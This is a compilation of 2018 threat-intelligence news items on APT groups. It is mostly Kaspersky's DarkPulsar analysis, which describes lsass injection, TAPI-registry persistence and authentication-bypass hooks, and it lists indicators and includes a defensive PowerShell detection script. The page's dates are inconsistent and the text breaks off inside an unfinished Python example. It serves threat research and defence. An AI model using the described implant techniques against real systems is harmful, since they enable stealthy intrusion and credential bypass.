- APT -

Last update 09.10.2017 12:41:24


20.10.2018 Kaspersky

In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.

DanderSpritz interface

Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:

This is the utility file of the framework. It duplicates the header from XML and includes the plugin’s ID.

This executable file is launched when FuZZbuNch receives the command to do so.

This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.

One of the most interesting FuzzBunch categories is called ImplantConfig and includes plugins designed to control infected machines via an implant at the post-exploitation stage. DarkPulsar, which belongs to this category, is a particularly interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control.

It supports the following commands:

Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.

While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant:

We reasoned that these constants would probably also appear in the backdoor itself, so we created a detection for them. Several months later we found the mysterious DarkPulsar backdoor, and we were later able to find both 32- and 64-bit versions.

We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

DarkPulsar technical highlights
The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:

Two nameless functions used to install the backdoor in the system.
Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.
The implementations of the SSPI and TSPI interfaces are minimalistic: the functions exported by DarkPulsar have the same names as the interface functions; however, they contain malicious code instead of telephony or security-provider functionality.

The implant is installed in the system by the nameless exported function. The backdoor is launched by calling Secur32.AddSecurityPackage with administrator privileges, passing the path to its own library as the parameter; this causes lsass.exe to load DarkPulsar as an SSP/AP and to call its exported function SpLsaModeInitialize, which DarkPulsar uses to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. The installer also adds its library name under HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers.

This registration causes the library to be loaded at startup by the Telephony API service (TapiSrv), which is launched alongside the Remote Access Connection Manager (RasMan) service; the installer sets the startup type to “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion, which contains the AddSecurityPackage call that performs the injection into lsass.exe.

DarkPulsar implements its payload by installing hooks on SpAcceptLsaModeContext, the function responsible for authentication. These hooks are placed in several system authentication packages inside the lsass.exe process and allow DarkPulsar to control the authentication process for the following protocols:

Msv1_0.dll – for the NTLM protocol,
Kerberos.dll – for the Kerberos protocol,
Schannel.dll – for the TLS/SSL protocols,
Wdigest.dll – for the Digest protocol, and
Lsasrv.dll – for the Negotiate protocol.
After this, DarkPulsar gains the ability to embed malware traffic into system protocols. Since this network activity follows the standard system protocol flows, it is only reflected in the System process: it uses the system ports reserved for the above protocols without hindering their normal operation.

Network traffic during successful connection to DarkPulsar implant

The second advantage of controlling the authentication process is the ability to bypass entering a valid username and password to obtain access to objects that require authentication, such as the process list, the remote registry and the file system over SMB. After DarkPulsar’s DisableSecurity command is sent, the backdoor’s hooks on the victim side will always return from SpAcceptLsaModeContext indicating that the supplied credentials are valid. Given that result, the system will grant the client access to protected objects.

Working with DarkPulsar
Darkpulsar-1.1.0.exe is the administrative interface, working on the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar- or as command-line arguments, detailing at least:

whether the target machine uses a 32-bit or 64-bit system;
the protocol (SMB, NBT, SSL and RDP are supported) used to deliver the command, and the port number;
the private RSA key used to decrypt the session AES key.
Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines. This utility is a plugin of the FuzzBunch framework, which manages parameters and coordinates the different components. Here is how the DisableSecurity command looks in FuzzBunch:

Below is an example of Processlist after DisableSecurity, which allows any plugin to be executed without valid credentials while operating via regular system functions (here, the remote registry service):

DanderSpritz is the framework for controlling infected machines. It differs from FuZZbuNch in that the latter provides only a limited toolkit for the post-exploitation stage, with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.

DanderSpritz, by contrast, works with a larger range of backdoors, using PeddleCheap on the victim side to let operators launch plugins. PeddleCheap is a DanderSpritz plugin that can be used to configure implants and connect to infected machines. Once a connection is established, all DanderSpritz post-exploitation features become available.

This is how DarkPulsar in EDFStagedUpload mode provides the opportunity to infect the victim with a more functional implant: PCDllLauncher (Fuzzbunch’s plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence, the full name of PCDllLauncher is ‘PeddleCheap DLL Launcher’.

The complete DanderSpritz usage scheme with the plugin PeddleCheap via FuZZbuNch with the plugins DarkPulsar and PCDllLauncher consists of four steps:

Via FuZZbuNch, run command EDFStagedUpload to launch DarkPulsar.
In DanderSpritz, run command pc_prep (PeddleCheap Preparation) to prepare the payload and the library to be launched on the implant side.
In DanderSpritz, run command pc_old (which is the alias of command pc_listen -reuse -nolisten -key Default) – this sets it to wait for a socket from Pcdlllauncher.
Launch Pcdlllauncher via FuZZbuNch and specify the path to the payload that has been prepared with the command pc_prep in the ImplantFilename parameter.


File System plugin

The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.

The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and showed how they are parts of the same attack platform designed for long-term compromise, based on DarkPulsar’s advanced persistence and stealth capabilities. The implementation of these capabilities, such as encapsulating its traffic in legitimate protocols and bypassing the need to supply credentials to pass authentication, is highly professional.

Our products can completely remove the malware related to this attack.

Detecting malicious network activity
When EDFStagedUpload is executed in an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:

When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:

When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:

Implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
File path – %SystemRoot%\System32\sipauth32.tsp
Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers
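As an added defender-side check, written for this page and not part of Kaspersky’s report or tooling, the following PowerShell script enumerates the telephony service providers registered under the key listed above, flags any entry whose file name or hash matches the indicators given in the report (or whose file is missing from disk), and lists TCP sockets owned by lsass.exe, since the report notes that the implant leaves bound sockets in that process. It assumes the standard TAPI layout in which providers are registered as ProviderFileName<N> values, and that the 32-character indicator above is an MD5 hash.

```powershell
# Added defender-side check for the DarkPulsar indicators quoted in the report above.
# Assumptions: TAPI providers are stored as ProviderFileName<N> values under the
# Telephony\Providers key (standard TAPI layout), and the reported 32-hex-character
# indicator is an MD5 hash. Run from an elevated PowerShell session.

$ProvidersKey     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Providers'
$KnownImplantName = 'sipauth32.tsp'                        # file name from the report
$KnownImplantHash = '96f10cfa6ba24c9ecd08aa6d37993fe4'     # hash from the report (assumed MD5)
$ExpectedPath     = Join-Path $env:SystemRoot "System32\$KnownImplantName"

function Get-TelephonyProviders {
    # Returns one object per registered TSP: index, file name, resolved path, existence, hash.
    $key = Get-ItemProperty -Path $ProvidersKey -ErrorAction SilentlyContinue
    if (-not $key) { return @() }
    foreach ($prop in $key.PSObject.Properties) {
        if ($prop.Name -notmatch '^ProviderFileName(\d+)$') { continue }
        $index = [int]$Matches[1]
        $file  = [string]$prop.Value
        # Bare file names are loaded from System32; absolute paths are honoured as given.
        $resolved = if ([IO.Path]::IsPathRooted($file)) { $file }
                    else { Join-Path $env:SystemRoot "System32\$file" }
        $exists = Test-Path -LiteralPath $resolved
        $hash   = if ($exists) {
                      (Get-FileHash -LiteralPath $resolved -Algorithm MD5).Hash.ToLower()
                  } else { $null }
        [pscustomobject]@{
            Index = $index; FileName = $file; Path = $resolved; Exists = $exists; Hash = $hash
        }
    }
}

function Test-DarkPulsarProviderIndicators {
    # Flags providers whose file name or hash matches the report's indicators. A provider
    # entry with no file on disk is also flagged: it is worth a closer look even when it
    # is not DarkPulsar, because a removed implant can leave the registration behind.
    foreach ($p in Get-TelephonyProviders) {
        $reasons = @()
        if ($p.FileName -ieq $KnownImplantName)        { $reasons += 'file name matches sipauth32.tsp' }
        if ($p.Hash -and $p.Hash -eq $KnownImplantHash) { $reasons += 'hash matches reported implant' }
        if (-not $p.Exists)                             { $reasons += 'provider file not found on disk' }
        [pscustomobject]@{
            Index      = $p.Index
            FileName   = $p.FileName
            Path       = $p.Path
            Suspicious = ($reasons.Count -gt 0)
            Reasons    = ($reasons -join '; ')
        }
    }
}

function Get-LsassTcpSockets {
    # Lists TCP sockets owned by lsass.exe. On a member server or workstation lsass.exe
    # normally owns none; on a domain controller it legitimately listens on Kerberos and
    # LDAP ports, so review the list in that context. Needs the NetTCPIP module
    # (Windows 8 / Server 2012 and later); on older systems use 'netstat -ano' instead.
    if (-not (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue)) { return @() }
    $lsass = Get-Process -Name lsass -ErrorAction SilentlyContinue | Select-Object -First 1
    if (-not $lsass) { return @() }
    Get-NetTCPConnection -OwningProcess $lsass.Id -ErrorAction SilentlyContinue |
        Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State
}

# Run the checks and print a summary.
$findings = @(Test-DarkPulsarProviderIndicators)
if ($findings.Count -eq 0) { Write-Host 'No telephony service providers registered.' }
$findings | Format-Table -AutoSize
$flagged = @($findings | Where-Object { $_.Suspicious })
Write-Host ("{0} provider(s) flagged." -f $flagged.Count)

# Standalone file check, in case the provider entry was removed but the file remains.
if (Test-Path -LiteralPath $ExpectedPath) {
    $h = (Get-FileHash -LiteralPath $ExpectedPath -Algorithm MD5).Hash.ToLower()
    $note = if ($h -eq $KnownImplantHash) { ' (matches reported DarkPulsar hash)' } else { '' }
    Write-Host ("{0} present, MD5 {1}{2}" -f $ExpectedPath, $h, $note)
}

Write-Host 'TCP sockets owned by lsass.exe:'
Get-LsassTcpSockets | Format-Table -AutoSize
```

A hash mismatch does not clear a host: the report found both 32- and 64-bit builds and lists only one hash, so treat any unexpected provider entry as worth investigating.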

DarkPulsar FAQ
20.10.2018 Kaspersky 
What’s it all about?
In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The FuzzBunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they form a very powerful platform for cyber-espionage.

How was this implant discovered?
We always analyze all leaks containing malicious software to provide the best detection. The same happened after the “Lost in Translation” leak was revealed. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only. We also noticed some magic constants in this administrative module, and having created some special signatures based on them, were able to catch the implant itself.

What exactly can this implant be used for?
This implant supports 7 commands:

The most interesting are DisableSecurity and EnableSecurity.

Burn – for self-deletion.
RawShellcode – to execute arbitrary position-independent code.
EDFStagedUpload – Exploit Development Framework Staged Upload. Step by step, it deploys DanderSpritz payloads into the victim’s memory without touching the drive. After this command is executed, the administrator can send any of the many DanderSpritz commands to the victim. (See the technical part of this report for details.)
DisableSecurity – for disabling NTLM protocol security. With the help of this command, the malware administrator does not need to know a valid victim username and password to successfully pass authentication; the system will interpret any arbitrary pair as valid. (See the technical part of this report for details.)
EnableSecurity – the opposite of DisableSecurity.
UpgradeImplant – for installing a new version of the backdoor.
PingPong – for test communication.
How many victims?
We found around 50 victims, but believe that the figure was much higher when the FuzzBunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time. A second point supporting this view is that, after stopping a cyber-espionage campaign, malware owners often delete their malware from victim computers, so the 50 victims are very probably just the ones the attackers simply forgot about.

Which countries?
All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected. Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D.

What about the attack duration? Does it last long?
DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.

Is the attack still active?
We think that after the “Lost In Translation” leak the espionage campaign was stopped, but that doesn’t mean that all computers are rid of this backdoor infection. We cured all our users. For users without our protection, we have several tips on how to check whether your system is infected and how to cure it yourself. Note that to make use of this backdoor on infected victims, the attackers need to know the private RSA key that pairs with the public key embedded in the backdoor. This means that no one except DarkPulsar’s real operators can use the compromised systems.

How to protect against this threat?
We can detect this threat with different technologies.

However, the standard recommendations remain the same:

Keep your security products up to date
Do not turn security product components off
Keep your OS updated
Install all security patches as soon as possible
Use special traffic analysis tools and pay attention to all encrypted traffic
Do not use weak passwords or the same password for several endpoints
Use complex passwords
Do not allow remote connections to endpoints with administration rights
Do not allow domain administrators to be local administrators with the same credentials
Which proactive technologies do you have to protect users against such threats?
We use machine learning, cloud technologies, emulation, and behavioral analysis in combination with anti-exploit protection to provide the best proactive protection for our clients.

Who is behind this threat?
We never engage in attribution. Our purpose is to counteract all threats, regardless of their source or destination.

How was this implant used? Was it created for stealing money or just information?
We have not seen any techniques for stealing money in this implant, but it is worth keeping in mind that this implant can run any executable code, so its functionality can be increased significantly.

Attackers behind Operation Oceansalt reuse code from Chinese Comment Crew
20.10.2018 securityweek

Security researchers from McAfee have recently uncovered a cyber espionage campaign, tracked as Operation Oceansalt, targeting South Korea, the United States, and Canada.
The threat actors behind Operation Oceansalt are reusing malware previously associated with China-linked cyberespionage group APT1.

“McAfee Advanced Threat Research and Anti-Malware Operations teams have discovered another unknown data reconnaissance implant targeting Korean-speaking users.” reads the report.

“We have named this threat Operation Oceansalt based on its similarity to the earlier malware Seasalt, which is related to earlier Chinese hacking operations. Oceansalt reuses a portion of code from the Seasalt implant (circa 2010) that is linked to the Chinese hacking group Comment Crew. Oceansalt appears to have been part of an operation targeting South Korea, United States, and Canada in a well-focused attack.”

The APT1 cyberespionage group, aka Comment Crew, was first exposed in 2013 by experts from Mandiant. The evidence collected by the security experts links APT1 to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department (Military Cover Designator 61398). Experts believe the group has been active since 2006 and has targeted hundreds of organizations in multiple industries.

According to McAfee, Operation Oceansalt was not conducted by APT1; the attackers leverage the Oceansalt implant, which borrows code from the APT1 tool dubbed Seasalt.

Both pieces of malware use a similar command handler and index table, and exactly the same response codes associated with command execution.

“Oceansalt contains the following strings that are part of Seasalt:

Both implants have a high degree of similarity in code sharing and functions. A few of their commonalities follow.”

According to the researchers, the implant is only a first-stage component that allows operators to perform various actions on the infected systems and to download additional components.

Oceansalt implements a dozen commands, including extract drive information, send information about a specific file, execute a command line using WinExec(), delete file, create file, get information on the running processes, terminate process, create/operate/terminate reverse shell, and test receive and send capabilities.

Operation Oceansalt

At the time of the analysis, it was still unclear who was behind the campaign; the only certainty was that the attackers somehow had access to APT1’s source code, even though it was never publicly disclosed.

The Oceansalt implant was used in at least five campaigns and was customized to the specific targets.

In the first two waves of attacks, the threat actors used spear-phishing emails with weaponized Korean-language Microsoft Excel documents to download the implant. In the third campaign the hackers leveraged weaponized Microsoft Word documents, while the remaining waves of attacks targeted a small number of entities outside of South Korea, including the U.S. and Canada.

The attackers used several command and control (C&C) servers; analysis of these revealed that the Operation Oceansalt campaign is active in Canada, Costa Rica, the United States, and the Philippines.

“Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown.” McAfee concludes.

“However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets.”

'GreyEnergy' Cyberspies Target Ukraine, Poland
19.10.2018 securityweek 
APT  CyberSpy  ICS

Over the past three years, ESET security researchers have been tracking a cyber-espionage group linked to the infamous BlackEnergy hackers.

BlackEnergy has been around since at least 2007, but rose to prominence in December 2015 when it caused a major blackout. The newly documented group, which ESET refers to as GreyEnergy, emerged around the same time.

Another group that emerged around the same time is TeleBots, which is said to have orchestrated the massive NotPetya outbreak last year. Recently, the security researchers managed to link the group to Industroyer, which is considered the most powerful modern malware targeting industrial control systems (ICS).

According to an ESET report published on Wednesday (PDF), the BlackEnergy threat actor evolved into two separate groups, namely TeleBots and GreyEnergy. The former is focused on launching cybersabotage attacks on Ukraine, through computer network attack (CNA) operations.

Over the past three years, GreyEnergy was observed being involved in attacks targeting entities in Ukraine and Poland, but mainly focused on cyber-espionage and reconnaissance. The group's operations have been aimed at energy sector, transportation, and other high-value targets.

The GreyEnergy malware features a modular architecture, meaning that its capabilities are dependent on the modules the operator chooses to deploy. These modules, however, include backdoor, file extraction, screenshot capturing, keylogging, password and credential stealing, and other functionality.

“We have not observed any modules that specifically target Industrial Control Systems software or devices. We have, however, observed that GreyEnergy operators have been strategically targeting ICS control workstations running SCADA software and servers,” Anton Cherepanov, a senior security researcher at ESET, reveals.

None of the malware’s modules, ESET says, is capable of affecting ICS, but its operators did use, on at least one occasion, a disk-wiping component to disrupt operating processes. One of the GreyEnergy samples was using a valid digital certificate likely stolen from Taiwanese company Advantech.

The actor is targeting organizations either through compromised self-hosted web services or via spear-phishing emails with malicious attachments.

The attackers would also deploy additional backdoors to the compromised web servers that are accessible from the Internet. The hackers favor PHP backdoors and use several layers of obfuscation and encryption to hide the malicious code.

The attachments of spear-phishing emails would first drop a lightweight first-stage backdoor dubbed GreyEnergy mini (and also known as FELIXROOT) to map the network and collect admin credentials using tools such as Nmap and Mimikatz.

The collected credentials are then used to deploy the main GreyEnergy malware, which requires administrator privileges. The backdoor is deployed on servers with high uptime and workstations used to control ICS environments. Additional software (proxies deployed on internal servers) is used to communicate with the command and control (C&C) server as stealthily as possible.

Written in C and compiled using Visual Studio, the GreyEnergy malware is usually deployed in two modes: in-memory-only mode, when no persistence is required, and using Service DLL persistence, to survive system reboots. The functionality of the malware is the same in both cases.

The GreyEnergy modules researchers have observed to date are meant to inject a PE binary into a remote process; collect information about the system and event logs; perform file system operations; grab screenshots; harvest key strokes; collect saved passwords from various applications; use Mimikatz to steal Windows credentials; use Plink to create SSH tunnels; and use 3proxy to create proxies.

The malware leverages Tor relay software when active, with C&C infrastructure set up similarly to that of BlackEnergy, TeleBots, and Industroyer. Furthermore, GreyEnergy and BlackEnergy have a similar design and a similar set of modules and features, although they are implemented differently.

Furthermore, ESET researchers discovered a worm that appears to be the predecessor of NotPetya, and which they call Moonraker Petya. The malware, which contains code that makes the computer unbootable, was deployed against a small number of organizations and has limited spreading capabilities.

Moonraker Petya shows a cooperation between TeleBots and GreyEnergy, or at least reveals they are sharing some ideas and code. The main difference between the two is that TeleBots focuses solely on Ukraine, while GreyEnergy operates outside the country’s borders as well.

“GreyEnergy is an important part of the arsenal of one of the most dangerous APT groups that has been terrorizing Ukraine for the past several years. We consider it to be the successor of the BlackEnergy toolkit. The main reasons for this conclusion are the similar malware design, specific choice of targeted victims, and modus operandi,” ESET concludes.

'Operation Oceansalt' Reuses Code from Chinese Group APT1
19.10.2018 securityweek

A recently observed cyber-espionage campaign targeting South Korea, the United States and Canada is reusing malicious code previously associated with state-sponsored Chinese group APT1, McAfee reports.

Exposed in a Mandiant report in 2013 and also known as Comment Crew, APT1 was thought to be a unit of China’s People’s Liberation Army (PLA) and was considered both one of the most persistent of China's cyber threat actors and highly prolific in terms of the quantity of information it had stolen.

The newly observed campaign is unlikely the work of APT1, which has remained silent ever since the Mandiant report half a decade ago. Previously, the group had launched cyber-attacks on more than 141 U.S. companies from 2006 to 2010.

Dubbed Oceansalt, the malware implant used in the new campaign shows code similarities with a tool employed by APT1, namely Seasalt. This means that the actor behind the new operation had direct access to Comment Crew’s source code, although it was never made public.

McAfee’s report (PDF) on Oceansalt doesn’t provide a clear answer on who is behind these attacks, but notes that the code overlap could suggest that another group had access to the original code, or that it is a case of code-sharing between actors. Of course, it could also be a “false flag” operation.

McAfee’s security researchers discovered that Oceansalt was launched in five attack waves adapted to the targets.

While the first two attacks were spearfishing-based and used malicious Korean-language Microsoft Excel documents to download the implant, the third switched to Microsoft Word documents instead. Waves four and five targeted a small number of entities outside of South Korea, including the U.S. and Canada.

During the attacks, the hackers used multiple command and control (C&C) servers, showing that the campaign is active in countries such as Canada, Costa Rica, the United States, and the Philippines.

Oceansalt and Seasalt, McAfee notes, not only contain two exact same strings (Upfileer and Upfileok), but also show similarities in command handler and index table, and execute their capabilities in the same way. Furthermore, both use the exact same response codes to indicate the success or failure of command execution.

Both implants use the same codes for drive and file reconnaissance, and for the creation of reverse-shells (which are based on cmd.exe). Unlike Seasalt, however, Oceansalt uses an encoding and decoding mechanism, and a hardcoded control server address, but employs no persistence method.

According to McAfee, evidence that suggests code-sharing between Oceansalt authors and Comment Crew include the different mechanism for getting the C&C IP addresses, as well as the lack of reverse-shell capability in some Oceansalt samples, the presence of debug strings in Oceansalt, and the presence of new functions in one Oceansalt variant.

The implant, the researchers reveal, packs a broad range of capabilities to capture data from the victims’ machines, but it is only a first-stage component, with additional stages downloaded through commands. The malware, however, provides operators with the ability to perform various actions on the system.

Oceansalt includes support for a dozen commands: extract drive information, send information about a specific file, execute a command line using WinExec(), delete file, create file, get information on the running processes, terminate process, create/operate/terminate reverse shell, and test receive and send capabilities.

“Our research shows that Comment Crew’s malware in part lives on in different forms employed by another advanced persistent threat group operating primarily against South Korea. This research represents how threat actors including nation-states might collaborate on their campaigns,” McAfee concludes.

Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

17.10.2018 securityaffairs APT  BigBrothers

The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.
The Security Service of Ukraine (SBU) uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities.
The SBU attributed the attack to the BlackEnergy Russia-linked APT group.
“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.

The BlackEnergy malware was enhanced to target SCADA systems; some variants include the KillDisk component, developed to wipe disks and make systems inoperable.

According to the SBU, the BlackEnergy hackers used new malware samples in a recent series of attacks. The new malicious code acts as surveillance software, implementing surveillance capabilities and remote administration features.

The SBU, along with experts from a well-known antivirus company, determined that the malware involved in the attack is an updated version of the Industroyer backdoor.

The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

The malware used in the recent attacks borrows code from Industroyer, as reported by the ukrinform.net website.

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.” states ukrinform.net.

Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.

Russia-linked APT group DustSquad targets diplomatic entities in Central Asia
17.10.2018 securityaffairs

Kaspersky experts published a detailed analysis of the attacks conducted by the Russian-linked cyber espionage group DustSquad.
In early October, security experts from ESET shared details about the operations of a cyber espionage group tracked as Nomadic Octopus, a threat actor focused on diplomatic entities in Central Asia.

The group has been active since at least 2015; ESET researchers presented their findings at the Virus Bulletin conference.

“ESET researchers recently discovered an interesting cyber espionage campaign active in several countries of Central Asia. We attribute these attacks to a previously undocumented APT group that we have named Nomadic Octopus.” states the blog post published by Virus Bulletin.

“Our findings suggest that this APT group has been active since at least 2015. The main goal of Nomadic Octopus appears to be cyber espionage against high-value targets, including diplomatic missions in the region.”

The experts presented their findings at the Virus Bulletin conference.

Now Kaspersky experts published a detailed analysis of the attacks conducted by the group, tracked by the Russian firm as DustSquad, and the tools they used.

Kaspersky has been monitoring the activity of the group for the last two years; DustSquad is a Russian-language cyberespionage group particularly active in Central Asia.

“For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware.” states the analysis published by Kaspersky Lab.

“The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018.”

The group targets its victims with spear-phishing emails, and the threat actors use Russian malware filenames.

Kaspersky tracked a campaign conducted by the group back to 2014 when hackers targeted entities in the former Soviet republics of Central Asia, plus Afghanistan.

In April 2018, the researchers discovered a new Octopus sample developed to target Windows systems, the malicious code had been disguised as a Russian version of the Telegram app used by the Democratic Choice (DVK) opposition party in Kazakhstan.

Attackers attempted to exploit the Kazakhstan government’s threat to block Telegram over its use by the DVK.

DustSquad fake Telegram

The Octopus Trojan is written in Delphi, the same programming language used by Russian-linked APT group Sofacy for the development of the Zebrocy backdoor.

The malicious code implements backdoor features, including the ability to execute commands, upload and download files, take screenshots, and find *.rar archives on the host.

Experts noted that, even though they found malware used by both DustSquad and Sofacy on the same compromised machines, the two cyber espionage groups are not linked.

Kaspersky pointed out that many components of the Octopus malware are still unfinished; the attackers likely created the malicious code in a hurry and did not implement certain features, such as communication functionality.

“Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware),” continues the Kaspersky report.

“Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.”

Additional technical details are reported in the analysis, including IoCs.

Threats in the Netherlands

13.1.0218 Kaspersky APT
Advanced threat actors and other malicious cyber activity
On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPWC in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red-handed trying to break into the OPWC’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.

Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.

One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.

For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec), others required a bit more effort.

In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.

The table below describes the number of tags that were hit per IP.

Tags hit   IPs
0          10,532
1          1,149
2          618
3          344
4          234
>4         938

One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP), is to find out who the victim is. We thus reversed the IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.

The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept; if not, we tried to find out to which organization the IP belonged.

At this point, for the entries that remained, the raw requests were retrieved and compared against the template request made by the APT. Finally, for each of the IPs left on our list, we tried to tie them to a company or institution. If this was possible, the entry was kept and marked as a TP.
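The filtering steps just described, as an added Python example that is not code from the Kaspersky post: it counts campaign tags per IP, drops IPs that hit more than four tags, confirms the reverse DNS name at first sighting against a passive-DNS view, and sets aside consumer ranges. The sinkhole rows, the passive-DNS records, the hostname markers used to recognise ADSL-style connections and the field layout are all constructed assumptions.

```python
from collections import defaultdict
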